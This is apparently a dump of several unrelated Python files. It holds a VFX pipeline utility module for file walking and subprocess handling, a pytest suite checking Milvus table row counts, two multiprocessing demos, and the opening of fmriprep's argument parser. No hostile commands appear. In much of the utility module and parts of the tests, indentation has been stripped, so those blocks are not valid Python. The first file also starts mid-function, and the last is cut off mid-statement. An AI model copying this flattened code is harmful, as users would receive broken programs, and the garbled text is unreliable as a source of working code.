numSeperators = directory.count(os.path.sep)
for root, dirs, files in os.walk(directory):
dirs[:] = [d for d in dirs if shouldInclude(d, root, True)]
yield root, dirs, files
currentSeperators = root.count(os.path.sep)
if depth > -1:
if numSeperators + depth <= currentSeperators:
del dirs[:]
try:
allFiles = []
for root, dirs, files in walkLevel(path, depth):
for d in dirs:
filepath = unixPath(os.path.join(root, d))
if not filesOnly and shouldInclude(d, root, True):
if fullPath:
allFiles.append(filepath)
else:
allFiles.append(filepath.replace(path, ''))
for f in files:
filepath = unixPath(os.path.join(root, f))
if shouldInclude(f, root, False):
if fullPath:
allFiles.append(filepath)
else:
allFiles.append(filepath.replace(path, ''))
return allFiles
except:
print 'folder not found:', path
return []
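# Illustrative call (hypothetical directory layout):
#   getFiles('/projects/shotA', fileIncludes=['*.exr'], folderExcludes=['tmp'],
#            depth=1, filesOnly=True)
#   -> full paths of EXR files at most one folder deep, skipping any folder
#      whose path contains "tmp"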
# Processes
##################################################
def getParentPID():
    '''
    Returns the process ID of the parent process.
    '''
    # older versions of psutil expose ppid as an attribute,
    # newer versions expose it as a method
    ppid = psutil.Process(os.getpid()).ppid
    if callable(ppid):
        return ppid()
    return ppid
def runCommand(processArgs, env=None):
    '''
    Joins the given arguments into a single command string and runs it
    with os.system. For psutil.Popen-based execution with Windows error
    dialogs disabled, see startSubprocess below. The env parameter is
    currently unused.
    '''
    command = ' '.join(ensureArray(processArgs))
    os.system(command)
# returns the output (STDOUT + STDERR) of a given command
def getCommandOutput(command, quiet=False, cwd=None, shell=True, env=None, **kwargs):
try:
if not quiet:
print 'command:\n', command
output = subprocess.check_output(
command,
cwd=cwd,
stderr=subprocess.STDOUT,
shell=shell,
env=env,
**kwargs)
if output and \
len(output) > 0 and \
output[-1] == '\n':
output = output[:-1]
if not output:
output = ''
return (output.lower(), False)
except subprocess.CalledProcessError as err:
return (False, err.output.lower())
except Exception as err:
return (False, err)
# wrapper around getCommandOutput to smooth over an OS difference:
# on Linux, a list of strings is joined into a single command string
def getCommandOutputParsed(command, quiet=False, cwd=None, shell=True, env=None, **kwargs):
parsed = command
if isLinux() and isinstance(parsed, list):
parsed = [' '.join(parsed)]
return getCommandOutput(parsed, quiet, cwd, shell, env, **kwargs)
# fix: should use a better methodology for this
# pretty sure python has some way of running a file
def runPython(pythonFile):
'''
Executes a given python file.
'''
return os.system('python ' + pythonFile)
def waitOnProcess(process,
checkInFunc=False,
checkErrorFunc=False,
timeout=False,
loggingFunc=False,
checkInInterval=10,
outputBufferLength=10000):
if not loggingFunc:
def loggingFunc(*args):
print ' '.join([str(arg) for arg in args])
if not checkInFunc:
def checkInFunc(*args):
return True
if not checkErrorFunc:
def checkErrorFunc(*args):
return True
def queueOutput(out, outQueue):
if out:
for line in iter(out.readline, ''):
outQueue.put(line)
out.close()
def checkProcess(process):
if not process.is_running():
print 'Process stopped'
return False
# STATUS_ZOMBIE doesn't work on Windows
if not isWindows():
return process.status() != psutil.STATUS_ZOMBIE
return True
def getQueueContents(queue, printContents=True):
contents = ''
lines = 0
maxLines = 500
while not queue.empty() and lines < maxLines:
line = queue.get_nowait()
contents += line
if printContents:
# remove the newline at the end
print line[:-1]
lines += 1
if lines >= maxLines:
print '\n\n\nbailed on getting the rest of the queue'
queue.queue.clear()
return contents
lastUpdate = 0
out = newOut = ''
err = newErr = ''
processStartTime = int(time.time())
    # the reader threads die with the program
outQueue = Queue.Queue()
processThread = threading.Thread(target=queueOutput, args=(process.stdout, outQueue))
processThread.daemon = True
processThread.start()
errQueue = Queue.Queue()
errProcessThread = threading.Thread(target=queueOutput, args=(process.stderr, errQueue))
errProcessThread.daemon = True
errProcessThread.start()
while checkProcess(process):
newOut = getQueueContents(outQueue, printContents=False)
newErr = getQueueContents(errQueue, printContents=False)
out += newOut
err += newErr
# remove starting and trailing whitespace
newErr = newErr.strip()
if newOut:
loggingFunc(newOut[:-1])
if newErr:
if checkErrorFunc:
checkErrorFunc(newErr)
else:
loggingFunc('\n\nError:')
loggingFunc(newErr)
loggingFunc('\n')
# check in to see how we're doing
if time.time() > lastUpdate + checkInInterval:
            # only keep the last outputBufferLength characters of the logs
out = out[-outputBufferLength:]
err = err[-outputBufferLength:]
lastUpdate = time.time()
if checkInFunc and not checkInFunc(out, err):
try:
process.kill()
except:
loggingFunc('Could not kill, please forcefully close the executing program')
return (False, 'Check in failed')
        # if we've been rendering longer than the time allotted, bail
processTime = (int(time.time()) - processStartTime) / 60.0
if timeout and processTime >= timeout:
loggingFunc('Process timed out. Total process time: %.2f min' % processTime)
return (False, 'timed out')
# call wait to kill the zombie process on *nix systems
process.wait()
sys.stdout.flush()
sys.stderr.flush()
newOut = getQueueContents(outQueue, printContents=False)
newErr = getQueueContents(errQueue, printContents=False)
out += newOut
err += newErr
if newOut:
loggingFunc(newOut[:-1])
if newErr and checkErrorFunc:
checkErrorFunc(err)
return (out, err)
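# Illustrative pairing with startSubprocess (defined below); the command is hypothetical:
#   proc = startSubprocess(['python', 'render_frame.py', '--frame', 1001])
#   out, err = waitOnProcess(proc, timeout=60, checkInInterval=5)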
def startSubprocess(processArgs, env=None, shell=False):
"""Runs a program through psutil.Popen, disabling Windows error dialogs"""
if env:
env = dict(os.environ.items() + env.items())
else:
env = os.environ
if sys.platform.startswith('win'):
# Don't display the Windows GPF dialog if the invoked program dies.
# See comp.os.ms-windows.programmer.win32
# How to suppress crash notification dialog?, Jan 14,2004 -
# Raymond Chen's response [1]
import ctypes
SEM_NOGPFAULTERRORBOX = 0x0002 # From MSDN
SEM_FAILCRITICALERRORS = 0x0001
try:
# equivalent to 0x0003
ctypes.windll.kernel32.SetErrorMode(SEM_NOGPFAULTERRORBOX | SEM_FAILCRITICALERRORS)
except:
print 'Error setting Windows Error Mode'
raise
CREATE_NO_WINDOW = 0x08000000
subprocess_flags = CREATE_NO_WINDOW
# Here for posterity but this seems to always fail, so not active at the moment
# This is supposed to suppress the Microsoft popup ('submit error to Microsoft')
# try:
# import _winreg
# keyVal = r'SOFTWARE\Microsoft\Windows\Windows Error Reporting'
# try:
# key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, keyVal, 0, _winreg.KEY_ALL_ACCESS)
# except:
# key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE, keyVal)
# # 1 (True) is the value
# _winreg.SetValueEx(key, 'ForceQueue', 0, _winreg.REG_DWORD, 1)
# except:
# print 'Error setting Microsoft Error Reporting, passing...'
else:
subprocess_flags = 0
if type(processArgs) == list:
command = ''
for i in range(len(processArgs)):
            # wrap the argument in quotes if it contains spaces, unless it's already quoted
if ' ' not in str(processArgs[i]) or \
(str(processArgs[i]).startswith('"') and str(processArgs[i]).endswith('"')):
arg = str(processArgs[i])
else:
if '"' in str(processArgs[i]):
arg = '"' + str(processArgs[i]).replace('"', '\\"') + '"'
else:
arg = '"' + str(processArgs[i]) + '"'
command += arg + ' '
else:
command = processArgs
print 'command:\n', command
if isLinux():
if type(processArgs) == list:
strProcessArgs = []
for i in range(len(processArgs)):
strProcessArgs.append(str(processArgs[i]))
command = strProcessArgs
else:
command = processArgs
return psutil.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
shell=shell,
creationflags=subprocess_flags)
def getCmdline(proc):
if isWindows():
return proc.cmdline
else:
return proc.cmdline()
# IO
##################################################
def readFile(path):
with open(path) as fileHandle:
return fileHandle.readlines()
def getOS():
if isWindows():
return 'windows'
if isLinux():
return 'linux'
if isMac():
return 'mac'
# OS
##################################################
def isWindows():
'''
Returns whether or not the machine running the command is Windows.
'''
return sys.platform.startswith('win')
def isLinux():
'''
Returns whether or not the machine running the command is Linux.
'''
return sys.platform.startswith('linux')
def isMac():
'''
Returns whether or not the machine running the command is Mac.
'''
return sys.platform.startswith('darwin')
# Command Line Utilities
##################################################
# fix: shouldn't really be using this, should
# generally call subprocess or some other way
def genArgs(argData):
'''
Generates a string of flag arguments from a dictionary.
Arguments are of the form -k1 v1 -k2 v2
'''
args = ''
for k,v in argData.iteritems():
args += '-%s %s ' % (k,v)
return args[:-1]
# fix: breaks on single dash arguments, improve
def getArgs(args=None):
i = 1
if not args:
args = sys.argv
options = {'__file__':args[0]}
    while i < len(args) - 1:
options[args[i].replace('-','').replace(':', '')] = args[i + 1]
i += 2
return options
def getTotalRam():
'''
Get the total system memory in GB on Linux and Windows
From:
http://stackoverflow.com/questions/2017545/get-memory-usage-of-computer-in-windows-with-python
'''
if isLinux():
totalMemory = os.popen('free -m').readlines()[1].split()[1]
return float(totalMemory) / 1024
elif isWindows():
import ctypes
class MemoryUse(ctypes.Structure):
_fields_ = [
('dwLength', ctypes.c_ulong),
('dwMemoryLoad', ctypes.c_ulong),
('ullTotalPhys', ctypes.c_ulonglong),
('ullAvailPhys', ctypes.c_ulonglong),
('ullTotalPageFile', ctypes.c_ulonglong),
('ullAvailPageFile', ctypes.c_ulonglong),
('ullTotalVirtual', ctypes.c_ulonglong),
('ullAvailVirtual', ctypes.c_ulonglong),
('sullAvailExtendedVirtual', ctypes.c_ulonglong),
]
def __init__(self):
# have to initialize this to the size of
# MemoryUse
self.dwLength = ctypes.sizeof(self)
super(MemoryUse, self).__init__()
stat = MemoryUse()
ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(stat))
return float(stat.ullTotalPhys) / 1024000000
else:
return 0
def numberOfProcesses():
return multiprocessing.cpu_count()
def findCaseInsensitiveFilename(path, mustExist=False):
'''
Finds a matching filename if one exists
ex:
c:/Some/Folder/awesome.txt
would match the actual file:
c:/some/folder/AWESOME.txt
if mustExist=False would also match
c:/some/folder/NewPath/yeah.txt
'''
path = unixPath(path)
parts = path.split('/')
pathFound = False
for i in range(len(parts)-1):
pathFound = False
searchRoot = '/'.join(parts[0:i+1]) + '/'
fileOrFolderToMatch = parts[i+1].lower()
if not os.path.isdir(searchRoot):
if mustExist:
print searchRoot, 'not a directory'
break
files = os.listdir(searchRoot)
for f in files:
# print 'checking:', f, fileOrFolderToMatch
if f.lower() == fileOrFolderToMatch:
parts[i+1] = f
pathFound = True
if not pathFound:
if mustExist:
print 'Could not find:', fileOrFolderToMatch
break
if mustExist and not pathFound:
return False
return '/'.join(parts)
def followFile(fileObject, waitTime=2):
    # go to the end of the file:
    # seek(0, 2) means offset 0 relative to the end (whence=2 is os.SEEK_END)
fileObject.seek(0, 2)
while True:
line = fileObject.readline()
if not line:
time.sleep(waitTime)
continue
# trim off the last character if it's a new line
if line[-1] == '\n':
line = line[:-1]
yield line
def main():
pass
# root = 'R:/Cadaver/Workspaces/CAD/CAD_055_010/render/v017/'
# files = os.listdir(root)
# files.sort()
# filenames = [root + f for f in files]
# # filenames = [
# # 'R:/Cadaver/Final_Renders/CAD/EXR_Linear/CAD_055_002_v0003/CAD_055_002_v0003.1016.exr',
# # 'R:/Cadaver/Workspaces/CAD/CAD_055_010/render/v017/CAD_055_010_fly.1009.exr',
# # 'C:/ie/shepherd/test/renders/v001/vray.0001.exr',
# # ]
# for filename in filenames:
# print filename
# print isValidEXR(filename)
# print normalizeFramePadding('C:/ACB/DEF/test.0001.exr')
# print normalizeFramePadding('C:/ACB/DEF/test.$F1.exr')
# print normalizeFramePadding('C:/ACB/DEF/test.#########.exr')
# print isValidEXRSequence('R:/Cadaver/Final_Renders/CAD/EXR_Linear/CAD_055_002_v0003/CAD_055_002_v0003.%04d.exr')
# pass
# openFileBrowser('C:/trash/replaceFileText.py')
# allFiles = getFiles('R:/Assets', fileExcludes = ['.*'])
# print '\n'.join(collapseFiles(allFiles))
# filename = 'r:/Blackish_s03/Final_Renders/BLA_308/EXR_Linear/BLA_308_018_020_v0007/BLA_308_018_020_v0007.%04.exr 1000-1048'
# print isFrameRangeText(filename)
# basePath = 'C:/Program Files/Chaos Group/V-Ray/Maya 2016 for x64/vray_netinstall_client_setup.bat'
# casePath = basePath.lower()
# basePath = 'R:/OpticalFlaresLicense.lic'
# casePath = 'r:/opticalFLARESLicense.lic'
# basePath = 'Q:/Users/Grant_Miller/projects/someSweetProject/yeah.py'
# casePath = 'Q:/Users/Grant_Miller/PROJECTS/someSweetProject/yeah.py'
# print basePath
# print findCaseInsensitiveFilename(casePath)
# print findCaseInsensitiveFilename(casePath, mustExist=True)
# print 'total ram:', getTotalRam()
# print normalizeFramePadding('A/B/C.D/e.35.exr')
# print normalizeFramePadding('A/B/C.D/e.5.testing.exr')
# print isValidSequence('sandbox/seq/frame.%04d.exr')
# print getPadding('A/B/C.D/e.5.testing.exr')
# print getPathInfo('test.1.exo.sc')['extension']
# print getHighestVersionFilePath('R:/Test_Project/Workspaces/publish/TPT_0010/3D', 'playblastTest_v0007', 'mb')
# print getFirstFileFromFrameRangeText("n:/my_cache/ramburglar/Aeroplane/Project_Assets/crash/fx/geo/center_secondary_debris_v0045/center_secondary_debris_v0045.1.bgeo.sc")
# print normalizeFramePadding("N:/my_cache/ramburglar/Test_Project/Workspaces/houdini_alembic/cache/pieces/v002/pieces.0001.abc")
# print getFrameRange('n:/my_cache/ramburglar/Aeroplane/Project_Assets/crash/fx/geo/center_secondary_debris_v0045/center_secondary_debris_v0045.%d.bgeo.sc')
# print getFrameRange('N:/my_cache/ramburglar/Test_Project/Workspaces/houdini_alembic/cache/pieces/v002/pieces.%04d.abc')
# print getExtension('A/B/C.abc')
# print getExtension('A/B/C.bgeo.sc')
# print getPadding('r:/Detour_s03/Workspaces/TD_303/TD_303_002_020/Plates/A_AlexaLog_v02/TD_303_002_020_A_AlexaLog_v02.1005.dpx')
if __name__ == '__main__':
main()
# startSubprocess(['source "/ie/shepherd/shepherd/jobTypes/maya/preRenderLinux.mel";'])
|
test_table_count.py
|
import random
import pdb
import pytest
import logging
import itertools
import time
from multiprocessing import Process
from milvus import Milvus
from utils import *
from milvus import IndexType, MetricType
dim = 128
index_file_size = 10
add_time_interval = 5
class TestTableCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
                pytest.skip("sq8h not supported in open source")
return request.param
def test_table_rows_count(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(table)
assert res == nb
def test_table_rows_count_after_index_created(self, connect, table, get_simple_index_params):
'''
        target: test get_table_row_count after an index has been created
        method: add vectors in db, create an index, then call get_table_row_count with correct params
        expected: the count is equal to the length of vectors
'''
nb = 100
index_params = get_simple_index_params
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(table, index_params)
status, res = connect.get_table_row_count(table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(table)
def test_table_rows_count_no_vectors(self, connect, table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str()
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(table)
assert res == 0
# TODO: enable
@pytest.mark.level(2)
@pytest.mark.timeout(20)
def _test_table_rows_count_multiprocessing(self, connect, table, args):
'''
target: test table rows_count is correct or not with multiprocess
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 2
uri = "tcp://%s:%s" % (args["ip"], args["port"])
vectors = gen_vectors(nq, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
def rows_count(milvus):
status, res = milvus.get_table_row_count(table)
logging.getLogger().info(status)
assert res == nq
process_num = 8
processes = []
for i in range(process_num):
milvus = Milvus()
milvus.connect(uri=uri)
p = Process(target=rows_count, args=(milvus, ))
processes.append(p)
p.start()
logging.getLogger().info(p)
for p in processes:
p.join()
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of L2
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str()
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
class TestTableCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
                pytest.skip("sq8h not supported in open source")
return request.param
def test_table_rows_count(self, connect, ip_table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(ip_table)
assert res == nb
def test_table_rows_count_after_index_created(self, connect, ip_table, get_simple_index_params):
'''
        target: test get_table_row_count after an index has been created
        method: add vectors in db, create an index, then call get_table_row_count with correct params
        expected: the count is equal to the length of vectors
'''
nb = 100
index_params = get_simple_index_params
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(ip_table, index_params)
status, res = connect.get_table_row_count(ip_table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, ip_table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(ip_table)
def test_table_rows_count_no_vectors(self, connect, ip_table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str("test_table")
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(ip_table)
assert res == 0
@pytest.mark.timeout(60)
def test_table_rows_count_multiprocessing(self, connect, ip_table, args):
'''
target: test table rows_count is correct or not with multiprocess
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 2
uri = "tcp://%s:%s" % (args["ip"], args["port"])
vectors = gen_vectors(nq, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
def rows_count(milvus):
status, res = milvus.get_table_row_count(ip_table)
logging.getLogger().info(status)
assert res == nq
process_num = 8
processes = []
for i in range(process_num):
milvus = Milvus()
milvus.connect(uri=uri)
p = Process(target=rows_count, args=(milvus,))
processes.append(p)
p.start()
logging.getLogger().info(p)
for p in processes:
p.join()
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of IP
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str('test_table_rows_count_multi_tables')
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
|
start_method_test.py
|
# coding: utf-8
#########################################################################
# Website: <a href="http://www.crazyit.org">疯狂Java联盟 (Crazy Java League)</a>   #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import multiprocessing
import os
def foo(q):
    print('New process started: (%s)' % os.getpid())
q.put('Python')
if __name__ == '__main__':
    # start new processes with the spawn method
    multiprocessing.set_start_method('spawn')
    q = multiprocessing.Queue()
    # create the child process
    mp = multiprocessing.Process(target=foo, args=(q, ))
    # start the child process
    mp.start()
    # read the message the child put on the queue
print(q.get())
mp.join()
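    # Note: with the 'spawn' start method the child re-imports this module,
    # which is why the Queue and Process setup must stay inside the
    # __main__ guard above.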
|
simple_processing.py
|
import multiprocessing as mp
import time
def suma(q, r):
    # accumulate the sum of r onto the running total stored in the queue
    pid = mp.current_process().name
    print("{} is working with {}".format(pid, r))
    res = q.get()
    for i in r:
        res += i
    q.put(res)

if __name__ == '__main__':
    # sequential processing:
    t = time.time()
    result = sum(range(100_000_000))
    print(result)
    print("Sequential Processing took: ", time.time() - t)
    # multi-process processing:
    t = time.time()
    q = mp.Queue()
    q.put(0)
    # split the work into two halves and pass the queue explicitly so it is
    # available in the children regardless of the start method
    pr1 = mp.Process(target=suma, args=(q, range(50_000_000)))
    pr2 = mp.Process(target=suma, args=(q, range(50_000_000, 100_000_000)))
    pr1.start()
    pr2.start()
    pr1.join()
    pr2.join()
    print(q.get())
    print("Multiprocess Processing took: ", time.time() - t)
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
fMRI preprocessing workflow
===========================
"""
import os
import os.path as op
import logging
import sys
import gc
import uuid
import warnings
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from multiprocessing import cpu_count
from time import strftime
import nibabel
nibabel.arrayproxy.KEEP_FILE_OPEN_DEFAULT = 'auto'
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
logger = logging.getLogger('cli')
def _warn_redirect(message, category, filename, lineno, file=None, line=None):
logger.warning('Captured warning (%s): %s', category, message)
def get_parser():
"""Build parser object"""
from ..info import __version__
verstr = 'fmriprep v{}'.format(__version__)
parser = ArgumentParser(description='FMRIPREP: fMRI PREProcessing workflows',
formatter_class=RawTextHelpFormatter)
# Arguments as specified by BIDS-Apps
# required, positional arguments
# IMPORTANT: they must go directly with the parser object
parser.add_argument('bids_dir', action='store',
help='the root folder of a BIDS valid dataset (sub-XXXXX folders should '
'be found at the top level in this folder).')
parser.add_argument('output_dir', action='store',
help='the output path for the outcomes of preprocessing and visual '
'reports')
parser.add_argument('analysis_level', choices=['participant'],
help='processing stage to be run, only "participant" in the case of '
'FMRIPREP (see BIDS-Apps specification).')
# optional arguments
parser.add_argument('--version', action='version', version=verstr)
g_bids = parser.add_argument_group('Options for filtering BIDS queries')
g_bids.add_argument('--participant_label', '--participant-label', action='store', nargs='+',
help='a space delimited list of participant identifiers or a single '
'identifier (the sub- prefix can be removed)')
# Re-enable when option is actually implemented
# g_bids.add_argument('-s', '--session-id', action='store', default='single_session',
# help='select a specific session to be processed')
# Re-enable when option is actually implemented
# g_bids.add_argument('-r', '--run-id', action='store', default='single_run',
# help='select a specific run to be processed')
g_bids.add_argument('-t', '--task-id', action='store',
help='select a specific task to be processed')
g_perfm = parser.add_argument_group('Options to handle performance')
g_perfm.add_argument('--debug', action='store_true', default=False,
help='run debug version of workflow')
g_perfm.add_argument('--nthreads', '--n_cpus', '-n-cpus', action='store', default=0, type=int,
help='maximum number of threads across all processes')
g_perfm.add_argument('--omp-nthreads', action='store', type=int, default=0,
help='maximum number of threads per-process')
g_perfm.add_argument('--mem_mb', '--mem-mb', action='store', default=0, type=int,
help='upper bound memory limit for FMRIPREP processes')
g_perfm.add_argument('--low-mem', action='store_true',
help='attempt to reduce memory usage (will increase disk usage '
'in working directory)')
g_perfm.add_argument('--use-plugin', action='store', default=None,
help='nipype plugin configuration file')
g_perfm.add_argument('--anat-only', action='store_true',
help='run anatomical workflows only')
g_perfm.add_argument('--ignore-aroma-denoising-errors', action='store_true',
default=False,
help='ignores the errors ICA_AROMA returns when there '
'are no components classified as either noise or '
'signal')
g_perfm.add_argument("-v", "--verbose", dest="verbose_count", action="count", default=0,
                         help="increases log verbosity for each occurrence, debug level is -vvv")
g_conf = parser.add_argument_group('Workflow configuration')
g_conf.add_argument(
'--ignore', required=False, action='store', nargs="+", default=[],
choices=['fieldmaps', 'slicetiming'],
help='ignore selected aspects of the input dataset to disable corresponding '
'parts of the workflow (a space delimited list)')
g_conf.add_argument(
'--longitudinal', action='store_true',
help='treat dataset as longitudinal - may increase runtime')
g_conf.add_argument(
'--t2s-coreg', action='store_true',
help='If provided with multi-echo BOLD dataset, create T2*-map and perform '
'T2*-driven coregistration. When multi-echo data is provided and this '
'option is not enabled, standard EPI-T1 coregistration is performed '
'using the middle echo.')
g_conf.add_argument('--bold2t1w-dof', action='store', default=9, choices=[6, 9, 12], type=int,
help='Degrees of freedom when registering BOLD to T1w images. '
'9 (rotation, translation, and scaling) is used by '
'default to compensate for field inhomogeneities.')
g_conf.add_argument(
'--output-space', required=False, action='store',
choices=['T1w', 'template', 'fsnative', 'fsaverage', 'fsaverage6', 'fsaverage5'],
nargs='+', default=['template', 'fsaverage5'],
help='volume and surface spaces to resample functional series into\n'
' - T1w: subject anatomical volume\n'
' - template: normalization target specified by --template\n'
' - fsnative: individual subject surface\n'
' - fsaverage*: FreeSurfer average meshes\n'
'this argument can be single value or a space delimited list,\n'
'for example: --output-space T1w fsnative'
)
g_conf.add_argument(
'--force-bbr', action='store_true', dest='use_bbr', default=None,
help='Always use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--force-no-bbr', action='store_false', dest='use_bbr', default=None,
help='Do not use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--template', required=False, action='store',
choices=['MNI152NLin2009cAsym'], default='MNI152NLin2009cAsym',
help='volume template space (default: MNI152NLin2009cAsym)')
g_conf.add_argument(
'--output-grid-reference', required=False, action='store',
help='Deprecated after FMRIPREP 1.0.8. Please use --template-resampling-grid instead.')
g_conf.add_argument(
'--template-resampling-grid', required=False, action='store', default='native',
help='Keyword ("native", "1mm", or "2mm") or path to an existing file. '
'Allows to define a reference grid for the resampling of BOLD images in template '
'space. Keyword "native" will use the original BOLD grid as reference. '
'Keywords "1mm" and "2mm" will use the corresponding isotropic template '
'resolutions. If a path is given, the grid of that image will be used. '
'It determines the field of view and resolution of the output images, '
'but is not used in normalization.')
g_conf.add_argument(
'--medial-surface-nan', required=False, action='store_true', default=False,
help='Replace medial wall values with NaNs on functional GIFTI files. Only '
'performed for GIFTI files mapped to a freesurfer subject (fsaverage or fsnative).')
# ICA_AROMA options
g_aroma = parser.add_argument_group('Specific options for running ICA_AROMA')
g_aroma.add_argument('--use-aroma', action='store_true', default=False,
help='add ICA_AROMA to your preprocessing stream')
g_aroma.add_argument('--aroma-melodic-dimensionality', action='store',
default=None, type=int,
                         help='set the dimensionality of MELODIC before running '
'ICA-AROMA')
# ANTs options
g_ants = parser.add_argument_group('Specific options for ANTs registrations')
g_ants.add_argument('--skull-strip-template', action='store', default='OASIS',
choices=['OASIS', 'NKI'],
                        help='select ANTs skull-stripping template (default: OASIS)')
# Fieldmap options
g_fmap = parser.add_argument_group('Specific options for handling fieldmaps')
g_fmap.add_argument('--fmap-bspline', action='store_true', default=False,
help='fit a B-Spline field using least-squares (experimental)')
g_fmap.add_argument('--fmap-no-demean', action='store_false', default=True,
help='do not remove median (within mask) from fieldmap')
# SyN-unwarp options
g_syn = parser.add_argument_group('Specific options for SyN distortion correction')
g_syn.add_argument('--use-syn-sdc', action='store_true', default=False,
help='EXPERIMENTAL: Use fieldmap-free distortion correction')
g_syn.add_argument('--force-syn', action='store_true', default=False,
help='EXPERIMENTAL/TEMPORARY: Use SyN correction in addition to '
'fieldmap correction, if available')
# FreeSurfer options
g_fs = parser.add_argument_group('Specific options for FreeSurfer preprocessing')
g_fs.add_argument(
'--fs-license-file', metavar='PATH', type=os.path.abspath,
help='Path to FreeSurfer license key file. Get it (for free) by registering'
' at https://surfer.nmr.mgh.harvard.edu/registration.html')
# Surface generation xor
g_surfs = parser.add_argument_group('Surface preprocessing options')
g_surfs.add_argument('--no-submm-recon', action='store_false', dest='hires',
help='disable sub-millimeter (hires) reconstruction')
g_surfs_xor = g_surfs.add_mutually_exclusive_group()
g_surfs_xor.add_argument('--cifti-output', action='store_true', default=False,
help='output BOLD files as CIFTI dtseries')
g_surfs_xor.add_argument('--fs-no-reconall', '--no-freesurfer',
action='store_false', dest='run_reconall',
help='disable FreeSurfer surface preprocessing.'
' Note : `--no-freesurfer` is deprecated and will be removed in 1.2.'
' Use `--fs-no-reconall` instead.')
g_other = parser.add_argument_group('Other options')
g_other.add_argument('-w', '--work-dir', action='store',
help='path where intermediate results should be stored')
g_other.add_argument(
'--resource-monitor', action='store_true', default=False,
help='enable Nipype\'s resource monitoring to keep track of memory and CPU usage')
g_other.add_argument(
